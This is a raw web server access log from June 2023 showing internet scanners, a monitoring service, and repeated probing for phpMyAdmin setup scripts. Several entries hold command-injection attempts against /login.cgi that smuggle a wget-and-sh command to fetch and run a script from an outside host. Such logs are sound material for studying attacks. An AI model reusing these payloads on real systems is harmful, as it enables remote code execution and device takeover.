8.218.6.232 - - [07/Jun/2023:06:13:34 +0200] "GET http://212.91.246.83:80/dbadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
8.218.6.232 - - [07/Jun/2023:06:13:35 +0200] "GET http://212.91.246.83:80/mysql/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
8.218.6.232 - - [07/Jun/2023:06:13:35 +0200] "GET http://212.91.246.83:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
8.218.6.232 - - [07/Jun/2023:06:13:36 +0200] "GET http://212.91.246.83:80/phpma/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
8.218.6.232 - - [07/Jun/2023:06:13:36 +0200] "GET http://212.91.246.83:80/sqlweb/scripts/setup.php HTTP/1.0" 404 329 "-" "-"
8.218.6.232 - - [07/Jun/2023:06:13:37 +0200] "GET http://212.91.246.83:80/webdb/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
8.218.6.232 - - [07/Jun/2023:06:13:38 +0200] "GET http://212.91.246.83:80/websql/scripts/setup.php HTTP/1.0" 404 329 "-" "-"
8.218.6.232 - - [07/Jun/2023:06:13:38 +0200] "GET http://212.91.246.83:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
8.218.6.232 - - [07/Jun/2023:06:13:39 +0200] "GET http://212.91.246.83:80/php/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
8.218.6.232 - - [07/Jun/2023:06:13:39 +0200] "GET http://212.91.246.83:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 339 "-" "-"
8.218.6.232 - - [07/Jun/2023:06:13:40 +0200] "GET http://212.91.246.83:80/db/scripts/setup.php HTTP/1.0" 404 325 "-" "-"
8.218.6.232 - - [07/Jun/2023:06:13:40 +0200] "GET http://212.91.246.83:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
8.218.6.232 - - [07/Jun/2023:06:13:41 +0200] "GET http://212.91.246.83:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 335 "-" "-"
8.218.6.232 - - [07/Jun/2023:06:13:41 +0200] "GET http://212.91.246.83:80/phpmanager/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
8.218.6.232 - - [07/Jun/2023:06:13:42 +0200] "GET http://212.91.246.83:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
8.218.6.232 - - [07/Jun/2023:06:13:43 +0200] "GET http://212.91.246.83:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
8.218.6.232 - - [07/Jun/2023:06:13:43 +0200] "GET http://212.91.246.83:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
216.47.245.138 - - [07/Jun/2023:06:21:01 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
192.64.4.29 - - [07/Jun/2023:06:23:34 +0200] "HEAD /wordpress HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
192.64.4.29 - - [07/Jun/2023:06:23:34 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
192.64.4.29 - - [07/Jun/2023:06:23:34 +0200] "HEAD /wp HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
192.64.4.29 - - [07/Jun/2023:06:23:34 +0200] "HEAD /bc HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
192.64.4.29 - - [07/Jun/2023:06:23:34 +0200] "HEAD /bk HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
192.64.4.29 - - [07/Jun/2023:06:23:34 +0200] "HEAD /backup HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
192.64.4.29 - - [07/Jun/2023:06:23:34 +0200] "HEAD /old HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
192.64.4.29 - - [07/Jun/2023:06:23:35 +0200] "HEAD /new HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
192.64.4.29 - - [07/Jun/2023:06:23:35 +0200] "HEAD /main HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
192.64.4.29 - - [07/Jun/2023:06:23:35 +0200] "HEAD /home HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
162.142.125.14 - - [07/Jun/2023:06:24:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.14 - - [07/Jun/2023:06:24:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.14 - - [07/Jun/2023:06:24:46 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.14 - - [07/Jun/2023:06:24:46 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
80.82.78.4 - - [07/Jun/2023:06:29:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
109.205.213.105 - - [07/Jun/2023:06:30:43 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
80.82.78.4 - - [07/Jun/2023:06:32:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.78.4 - - [07/Jun/2023:06:32:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.78.4 - - [07/Jun/2023:06:32:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.78.4 - - [07/Jun/2023:06:32:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.78.4 - - [07/Jun/2023:06:32:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.78.4 - - [07/Jun/2023:06:32:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.78.4 - - [07/Jun/2023:06:32:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.78.4 - - [07/Jun/2023:06:32:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.78.4 - - [07/Jun/2023:06:33:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
109.205.213.108 - - [07/Jun/2023:06:33:18 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
198.235.24.195 - - [07/Jun/2023:06:33:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
179.43.162.124 - - [07/Jun/2023:06:34:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
193.106.29.122 - - [07/Jun/2023:06:37:34 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
206.189.196.2 - - [07/Jun/2023:06:39:11 +0200] "GET /download/po HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
206.189.196.2 - - [07/Jun/2023:06:39:11 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
109.205.213.106 - - [07/Jun/2023:06:41:35 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
172.104.11.4 - - [07/Jun/2023:06:42:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
109.205.213.108 - - [07/Jun/2023:06:46:11 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.4 - - [07/Jun/2023:06:47:29 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
193.106.29.122 - - [07/Jun/2023:06:48:30 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
109.205.213.117 - - [07/Jun/2023:06:49:05 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.5 - - [07/Jun/2023:06:53:04 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
172.104.11.4 - - [07/Jun/2023:06:53:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
109.205.213.39 - - [07/Jun/2023:06:55:36 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
198.235.24.182 - - [07/Jun/2023:06:55:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
179.43.162.124 - - [07/Jun/2023:06:58:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [07/Jun/2023:07:00:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.247.194 - - [07/Jun/2023:07:00:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0"
184.105.247.252 - - [07/Jun/2023:07:01:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
212.91.246.72 - - [07/Jun/2023:07:01:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.209.125.74 - - [07/Jun/2023:07:01:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [07/Jun/2023:07:02:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.79.181.94 - - [07/Jun/2023:07:02:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
184.105.247.194 - - [07/Jun/2023:07:03:02 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0"
184.105.247.252 - - [07/Jun/2023:07:03:02 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
212.91.246.72 - - [07/Jun/2023:07:03:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.247.252 - - [07/Jun/2023:07:03:56 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
184.105.247.194 - - [07/Jun/2023:07:04:00 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0"
212.91.246.72 - - [07/Jun/2023:07:04:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:05:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.133 - - [07/Jun/2023:07:05:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36"
212.91.246.72 - - [07/Jun/2023:07:06:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.131 - - [07/Jun/2023:07:06:57 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.57"
212.91.246.72 - - [07/Jun/2023:07:07:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.133 - - [07/Jun/2023:07:07:36 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36"
212.91.246.72 - - [07/Jun/2023:07:08:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.205.213.14 - - [07/Jun/2023:07:08:57 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [07/Jun/2023:07:09:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:10:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.244 - - [07/Jun/2023:07:10:35 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
194.72.121.146 - - [07/Jun/2023:07:10:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [07/Jun/2023:07:11:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.205.213.98 - - [07/Jun/2023:07:12:06 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [07/Jun/2023:07:12:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:13:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:14:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:15:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:16:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:17:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:18:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:19:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:20:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:21:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:22:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.128.13 - - [07/Jun/2023:07:23:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [07/Jun/2023:07:23:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.66.88.204 - - [07/Jun/2023:07:23:53 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [07/Jun/2023:07:24:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:25:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.205.213.107 - - [07/Jun/2023:07:25:58 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
45.128.232.62 - - [07/Jun/2023:07:26:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [07/Jun/2023:07:26:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:27:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [07/Jun/2023:07:27:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [07/Jun/2023:07:28:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.159.214.49 - - [07/Jun/2023:07:29:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
51.159.214.49 - - [07/Jun/2023:07:29:00 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
212.91.246.72 - - [07/Jun/2023:07:29:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:30:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.225 - - [07/Jun/2023:07:30:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [07/Jun/2023:07:31:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [07/Jun/2023:07:31:14 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [07/Jun/2023:07:32:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:33:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:34:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:35:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:36:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:37:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:38:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:07:39:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
8.210.152.4 - - [07/Jun/2023:07:39:44 +0200] "GET http://212.91.246.87:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:44 +0200] "GET http://212.91.246.87:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:45 +0200] "GET http://212.91.246.87:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:46 +0200] "GET http://212.91.246.87:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:46 +0200] "GET http://212.91.246.87:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:47 +0200] "GET http://212.91.246.87:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:47 +0200] "GET http://212.91.246.87:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:51 +0200] "GET http://212.91.246.87:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:51 +0200] "GET http://212.91.246.87:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:52 +0200] "GET http://212.91.246.87:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:52 +0200] "GET http://212.91.246.87:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:53 +0200] "GET http://212.91.246.87:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:53 +0200] "GET http://212.91.246.87:80/pma/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:54 +0200] "GET http://212.91.246.87:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:54 +0200] "GET http://212.91.246.87:80/myadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:55 +0200] "GET http://212.91.246.87:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:55 +0200] "GET http://212.91.246.87:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:56 +0200] "GET http://212.91.246.87:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:56 +0200] "GET http://212.91.246.87:80/SQL/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:57 +0200] "GET http://212.91.246.87:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:58 +0200] "GET http://212.91.246.87:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:58 +0200] "GET http://212.91.246.87:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:59 +0200] "GET http://212.91.246.87:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:39:59 +0200] "GET http://212.91.246.87:80/admin/pma/scripts/setup.php HTTP/1.0" 404 332 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:00 +0200] "GET http://212.91.246.87:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 335 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:00 +0200] "GET http://212.91.246.87:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 337 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:02 +0200] "GET http://212.91.246.87:80/webadmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:02 +0200] "GET http://212.91.246.87:80/admin/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:03 +0200] "GET http://212.91.246.87:80/dbadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:03 +0200] "GET http://212.91.246.87:80/mysql/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
8.210.152.4 - - [07/Jun/2023:07:40:04 +0200] "GET http://212.91.246.87:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
